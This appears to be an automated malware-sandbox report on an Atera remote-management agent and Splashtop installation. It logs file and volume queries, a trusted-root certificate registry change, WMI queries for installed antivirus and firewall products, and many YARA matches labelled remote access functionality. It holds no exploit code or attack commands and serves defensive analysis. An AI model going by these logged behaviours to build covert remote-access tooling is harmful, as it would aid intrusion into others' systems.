                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC961.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIDCAB.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIF4AD.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00415508 GetSystemTimeAsFileTime,__aulldiv,36_2_00415508
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041C76C __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,36_2_0041C76C
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00429420 GetVersionExW,36_2_00429420
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct

                                Remote Access Functionality

                                barindex
                                Yara detected AteraAgent
                                Source: Yara matchFile source: 20.2.AgentPackageAgentInformation.exe.1be62a40000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.AteraAgent.exe.1c5cb450000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.1be62230000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.0.AgentPackageSTRemote.exe.21719510000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000D.00000002.2266876260.0000020AA05F0000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2916644902.0000004DD77F5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA07E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2179995487.000002E94EAE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1970238618.000002696E998000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F6BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644540988.000002171967C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C42000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1955362018.000001BE62C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1793012052.000001C5E5B60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2672625808.0000021732811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2935401771.0000016BD0D6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2206158038.000002E967EE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644865064.000002171968E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD21E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F5F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1954314035.000001BE62321000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2648442320.0000021719940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1969655757.0000026900083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2268866315.0000020AA09F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA15CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2648816776.000002171A0C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1954927501.000001BE62670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1E96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2972325371.0000016BE9F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1954314035.000001BE622E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2977086603.0000016BEA395000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2284530443.0000020ABA03C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1970238618.000002696E990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2086909400.0000022D4CA70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2089827549.000002332A61B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD2252000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1970116257.000002696E940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1794278518.00007FFD9B694000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD205000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2935178142.0000016BD0CD0000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789419276.000001C5CB820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2935401771.0000016BD0D4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA07DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1970238618.000002696EA14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD20A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2263664624.000000CBDA8F5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644865064.00000217196FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644865064.00000217196BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB54C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.1992596648.000002332A8C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2089827549.000002332A633000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2198254091.000002E967C21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA23D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD2175000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644865064.00000217196B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD236000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1970238618.000002696E9CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1969655757.0000026900073000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD24C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2179995487.000002E94EAA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1954314035.000001BE6236E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2089827549.000002332A610000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2179995487.000002E94EADB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2181419382.000002E94ED90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA1044000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA078E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.2614681807.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F523000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA0804000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA2A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2648816776.0000021719F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2644540988.0000021719670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD0D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2974355709.0000016BEA295000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1C3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2938112807.0000016BD0FC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB5B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.2618143412.0000000000620000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1789701258.000001C5CD15C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2267142526.0000020AA0750000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2090008634.000002332A8A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD1F78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.2184094049.000002E94F64C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1788731094.000001C5CB562000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2940646679.0000016BD21EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
